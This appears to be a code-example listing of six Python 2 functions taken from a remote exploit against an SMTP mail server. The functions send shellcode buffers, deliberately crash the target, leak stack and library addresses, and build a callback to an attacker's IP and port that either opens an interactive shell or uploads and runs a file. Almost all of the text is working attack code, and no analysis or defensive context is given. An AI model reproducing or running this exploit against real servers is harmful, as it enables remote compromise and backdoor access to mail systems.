Beispiel #1
0
 def exploit(self):
    try:
       attempt = self.attempt
    except AttributeError:
       attempt = self.attempt = 1
    nAttempts = self.nAttempts
    challenge = utils.buildBuffer(4, self.badBytes)
    shellcodeBuf = self.os.buildShellcodeBuffer(self,
                                                utils.buf2long(challenge))
    bounceBuf = self.buildBounceBuffer()
    self.startNewMsg()
    sd = self.sd
    if ((attempt == self.nAttempts) and (1 == attempt)):
       print "\nSending exploit:"
    elif (attempt <= self.nAttempts):
       print "\nSending exploit (attempt %d of %d):" % (attempt, nAttempts)
    else:
       return 1
    smtpUtils.sendMsg(sd, bounceBuf, shellcodeBuf)
    try:
       reply = smtpUtils.recvReply(sd)
    except smtpUtils.smtpServerCrashed, err:
       print "FAILURE!"
       print "Target crashed -- probably because we were not talking to " \
             "the correct thread."
       self.attempt += 1
       return self.exploit()
Beispiel #2
0
 def crash(self):
    self.startNewMsg()
    sd = self.sd
    smtpUtils.sendMsg(sd, self.buildCrashBuffer(), self.buildCoverupBuffer())
    try:
       smtpUtils.recvReply(sd)
    except smtpUtils.smtpServerCrashed, err:
       print "Successfully crashed the target."
       self.conn = 0
       return 0
Beispiel #3
0
 def stackTouch(self, target, bruteForce=False):
     print "\nLooking for a %s stack:" % self.version
     stackBase = self.stackBase
     leakBuf = self.buildStackLeakBuffer(target, stackBase)
     target.startNewMsg()
     sd = target.sd
     smtpUtils.sendMsg(sd, leakBuf)
     try:
         reply = smtpUtils.recvReply(sd)
     except smtpUtils.smtpError, err:
         err.printMsg(" looking for a %s stack" % self.version)
         return 1
Beispiel #4
0
 def stackTouch(self, target, bruteForce=False):
    print "\nLooking for a %s stack:" % self.version
    stackBase = self.stackBase
    leakBuf = self.buildStackLeakBuffer(target, stackBase)
    target.startNewMsg()
    sd = target.sd
    smtpUtils.sendMsg(sd, leakBuf)
    try:
       reply = smtpUtils.recvReply(sd)
    except smtpUtils.smtpError, err:
       err.printMsg(" looking for a %s stack" % self.version)
       return 1
Beispiel #5
0
 if (None == self.imtaBase):
    imtaBase = 0xfe800000L
 else:
    imtaBase = self.imtaBase
 try:
    leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase)
 except IndexError, err:
    print "out of addrs"
    #self.crash()
    #connect
    #ehlo
    #self.conn = 0
    #leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase)
 self.startNewMsg()
 sd = self.sd
 smtpUtils.sendMsg(sd, leakBuf)
 try:
    reply = smtpUtils.recvReply(sd)
 except smtpUtils.smtpError, err:
    err.printMsg("")
    return 1
 if (matchBuf != reply):
    print "Target replied with:"
    utils.dumpHex(reply)
    print "Expected:"
    utils.dumpHex(matchBuf)
    sd.close()
    return 1
 print "Found libimta.so at 0x%08x." % imtaBase
 self.imtaBase = imtaBase
 return 0
Beispiel #6
0
def doExploit(parms):
   target = targets.factory(parms.get('target', None), badBytes)
   if (None == target):
      print "No target OS specified."
      return -1

   cport = parms.get('cport', None)
   clport = parms.get('clport', None);
   if (None == cport):
      ld, cport = bindCallbackListener(cport, clport)
   else:
      ld = bindCallbackListener(cport, clport)

   cip = parms.get('cip')
   callback.cip = socket.inet_aton(cip)
   callback.cport = utils.u16ToBeU16String(cport)

   authCode = utils.randomBase64(4,6)
   callback.authCode = authCode

   ufile = parms.get('upload', None)
   if (None != ufile):
      tmpnam = parms.get('tmpnam', None)
      if (None == tmpnam):
         tmpnam = utils.tmpnam()
      efile = parms.get('exec', None)
      if ((None != efile)
          and not (os.access(efile, os.F_OK or os.X_OK))):
         print "%s either does not exist or is not executable" % efile
         ld.close()
         return -1
      fd = open(ufile, 'r')
      ufileContents = fd.read()
      fd.close()
      mask = chr(random.randint(0,255))
      upload.data = mask	# okay, so I mean upload.mask, but oh well
      upload.tmpnam = tmpnam + "\0"
      unencoded = callback.build() + upload.build()
   else:
      unencoded = callback.build() + interactive.build()
   encoded = dulEncode(unencoded)

   domain = parms.get("domain", None)
   if (None == domain):   
      domain = utils.buildBuffer(0xe, badBytes)

   senderBegin = '\"' + utils.buildBuffer(3, badBytes)
   senderEnd = "\"@" + domain


   recipient = parms.get('recipient')

   finderValue = utils.buildBuffer(4, badBytes)
   sender2 = target.buildSender2(finderValue)
   if (None == sender2):
      print "Error building exploit message."
      ld.close()
      return -1

   body = finderValue +  encoded

   tip = parms.get('tip')
   tport = parms.get('tport')
   sd, banner = smtpUtils.connect(tip, tport, True)
   print banner.strip()
   if (None == re.compile(target.banner).search(banner)):
      print "The target's banner does not match expected banner."
      response = ' '
      while (("y" != response[0]) and ("n" != response[0])):
         response = string.lower(raw_input("Continue [y/N]? "));
         if ('' == response):
            response = "n"
      if ("n" == response[0]):
         sys.exit()

   smtpUtils.helo(sd, domain, validResponse)
   sent = 0
   maxLen = 0xff - len(senderBegin) - len(senderEnd)
   chop = maxLen % 4
   maxLen -= chop
   atimeout = parms.get('atimeout', None)
   if ("None" == atimeout):
      atimeout = None
   print "Sending a maximum of %d messages..." % (maxLen // 4)
   for fillLen in range(maxLen, 0, -4):
      # poll to see if we've received a callback
      status, ad = waitForCallback(ld, authCode, 0, atimeout)
      if (1 != status):
         smtpUtils.quit(sd)
         print "Sent %d messages." % sent
         break
      # send a new message
      sender1 = senderBegin
      senderBody = target.buildSender1(fillLen)
      if (None == senderBody):
         ld.close()
         return -1
      sender1 += senderBody
      sender1 += senderEnd

      try:
         smtpUtils.mailFrom(sd, sender1, validResponse)
         smtpUtils.rcptTo(sd, recipient, validResponse)
      except smtpUtils.smtpError, err:
         err.printMsg()
         print "\nSent %d messages." % sent
         ld.close()
         return -1
      smtpUtils.data(sd)
      smtpUtils.sendMsg(sd, "From: " + sender2, "Keywords: " + body)
      buf = smtpUtils.recvReply(sd).strip()
      print "%s:\t%s" % (hex(fillLen), buf)
      sent += 1